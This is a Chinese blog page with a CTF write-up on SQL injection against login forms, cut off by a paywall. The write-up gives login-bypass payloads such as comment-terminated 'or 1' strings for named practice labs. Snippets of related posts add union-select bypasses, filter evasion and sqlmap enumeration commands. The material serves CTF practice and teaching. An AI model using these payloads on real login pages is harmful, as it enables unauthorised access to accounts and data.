mysql 登录框注入_CTF| SQL注入之login界面类

最新推荐文章于 2024-08-11 13:28:35 发布
最新推荐文章于 2024-08-11 13:28:35 发布
阅读量2.5k 收藏 4
点赞数
文章标签: mysql 登录框注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34609222/article/details/113279087
版权
本文介绍了CTF中常见的SQL注入题目,包括不同难度级别的登录界面注入,解析了各种绕过限制的方法,如利用万能密码、特殊字符转义、group by with rollup等技术进行SQL注入。
摘要由CSDN通过智能技术生成

SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。

万能密码—very easy

题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php

题目来源:hacking lab inject 01~

17da91c3bdab

源代码有提示:

17da91c3bdab

万能密码登录语句构造:select * from admin where username='admin'and 1=1 #' and password='123456' ORselect * from admin where username='admin'or 1 #' and password='123456'

或者不需要admin。select * from admin where username='1'or 1 or 1 #' and password='123456'

还可以用#来注释。select * from admin where username='admin'#' and password='123456'

万能密码— easy

题目入口:http://redtiger.labs.overthewire.org/level2.php

题目来源:RedTigers Hackit Level 2 Simple login-bypass

做题密码:4_is_not_random构造语句: username=1&password=1'or'1'or'1&login=Login

17da91c3bdab

万能密码— not than easy

题目入口: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

题目来源:实验吧,不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!

最低0.47元/天 解锁文章
翡柏
关注
菜鸡做题·20200418会员登陆页面(CTF
wengbinqiang17的博客
04-18 1万+
题目地址:http://129.204.207.114 用火狐浏览器打开网址 对于登录 一般思路是 •爆破,一般的题目用户名都是admin •Sql注入 •信息泄露 F12查看网页源代码 得到账号密码 账号:admin 密码:welcome_to_ctf 登录,进入flag.php页面 当我们成功登录时就能将flag.txt的内容写进session了,而且会将对应的$_SESSION['us...
ctf-WEB-login2(sql注入)
god_001的博客
05-12 2720
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
第四章 SQL注入
最新发布
weixin_51186121的博客
08-11 300
SQL注入问题说的是:用户输入的信息中含有SQL语句关键字,和程序中的SQL语句进行字符串拼接,导致程序中的SQL语句改变了原意。原因是:用户提供的信息中有SQL语句关键字,并且和底层的SQL字符串进行了拼接,变成了一个全新的SQL语句。,也就是说:用户提供的信息中即使含有SQL语句的关键字,那么这个信息也只会被当做一个值传递给SQL语句,用户提供的信息不再参与SQL语句的编译了,这样就解决了SQL注入问题。如果以上的SQL语句能够查询到结果,说明用户名和密码是正确的,则登录成功。
mysql 登录注入_登陆界面SQL注入
weixin_42245967的博客
02-18 2772
首先登陆的sql通常分为两种型1234567(1)先匹配username(注册时也似这种方法验重)$query = mysql_query("SELECT * FROM interest WHERE uname = '{$_POST['uname']}");$key = mysql_fetch_array($query);if($key['pwd'] == $_POST['pwd']) {.....
DC-1 登录sql注入
a_153161的博客
12-04 1185
DC-1登录的报错注入
python sql注入漏洞 ctf_CTF-WEB 一个登录SQL盲注
weixin_39921131的博客
12-09 479
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。首先找注入点:发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了)开始尝试编写脚本,结果发现简单的reuqests解析不了标签下的内容没办法 又去学习一下“美丽的汤”Beautifulso...
CTF-Web SQL注入
weixin_52182264的博客
04-26 4353
sql注入基本情况了解 联合查询注入union 报错注入 一.sql注入基本信息 1. sql注入方式 常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入 提交数据的方式是GET,注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单
flask mysql sql注入_SQL注入进阶-Flask中转SQLMAP案例
weixin_39797693的博客
02-06 207
前言在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?一道CTF题的思考先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,...
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1606
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
mysql注入过滤逗号,SQL注入简单总结——过滤逗号注入
weixin_33806343的博客
03-18 948
最近做了一些CTF题目,发现sql题目很喜欢出过滤","的题目,借此机会特此总结。并且我有一个想法能够通过编写tamper尽量多的解决sql注入的题目。在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:select substr(database() from 1 for...
SQL注入
flylr^的博客
08-12 1329
Sql注入指的是web程序对用户输入的过滤不足,致使非法数据入侵系统;sql注入是一种常见的数据库攻击手段,sql注入漏洞也是网络世界中最普遍的漏洞之一。
BugkuCTF 这是一个神奇的登陆
3tu6b0rn的博客
05-15 364
post注入 直接跑sqlmap吧 抓包到本地 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" admin_name存在注入点 查数据库 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...
CTF-WEB 一个登录SQL盲注
热门推荐
weixin_45887311的博客
04-24 1万+
一些师兄给了个平台,最近学了很多SQL注入和编写脚本的知识,跃跃欲试,结果这一做就是漫漫长路,还是很多东西不熟悉啊。 首先找注入点: 发现用户名错误和密码错误会分开提示,可以用布尔盲注,(*^▽^*)好高兴。 但是发现,过滤了空格和 *号,没关系,用括号绕过(这一下搞死我了) 开始尝试编写脚本,结果发现简单的reuqests解析不了<div>标签下的内容 ...
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3568
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
“百度杯”CTF比赛 十月场_Login
a173262565的博客
04-24 398
题目在i春秋ctf大本营 打开页面是两个登录,首先判断是不是注入 尝试了各种语句后,发现登录界面似乎并不存在注入 查看网页源代码,给出了一个账号 用帐密登陆后,跳转到到member.php网页,网页本身并没有什么提示内容 接着抓包查看,这里找了好久,最后在返回包的头文件中发现了一个可以参数 尝试在请求头中加入show参数: 返回一段源代码,开始审计之路:...
CTF-登陆一下好么?
Grey的博客
05-04 1367
、select * from user where username='用户名' and password='密码'  利用  1'='1  0'='0这样显然不行,因为查询到数据库中没有username=1 的元组,返回了0而  0 !='1'  所以需要改为  username= 1'='0password= 1'='0先看前面username那一块,由于两个等号是从左往右计算的,userna...
登录页面的SQL注入漏洞
m0_61974571的博客
10-12 3884
1、在Linux准备一套Xampp或者Phpstudy:模拟攻防2、在vscode安装Rremote Development插件,进行远程调试新添加主机 在opt/lampp/security创建项目 login.php welcome.php 二、进行登陆的渗透测试 注入攻击的核心点: (1)、拼接为有效的代码或语句(2)、确保完成了闭合,并且可以改变原有执行逻辑通常并非处理一下就可以完成拼接和闭合,需要不停的尝试,知道出现不一样的结果。这个尝试过程建议使用python+字典快速处理上述代码一共存
解决JDBC实现用户登录时出现SQL注入问题详解
何义竏
11-25 1166
JDBC实现用户登录时出现SQL注入问题JDBC实现用户登录SQL注入解决SQL注入 JDBC实现用户登录: public class jdbcTest06{ public satic void main(String[] args){ Map<String,String> userLoginInfo initUI(); boolean loginSuccess = login(userLoginInfo); System.out.println(
登陆中常用的sql注入语句
06-14
作为AI助手,我不会介绍任何有害或恶意的行为,包括SQL注入攻击。SQL注入是一种常见的网络安全漏洞,攻击者利用程序员没有正确验证和转义用户输入,将恶意SQL代码插入到数据库查询中的情况。这可能导致数据泄露、系统权限篡改等风险。 安全提示:在开发过程中,务必遵循严格的输入验证和参数化查询,使用预编译语句或ORM(对象关系映射)架,以防止SQL注入。 如果你对SQL注入防御或者最佳实践有兴趣,我可以提供相关的信息: 1. SQL注入的基本原理和防范措施是什么? 2. 如何在代码中实施参数化查询以防止注入? 3. ORM架如何帮助减轻SQL注入的风险?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值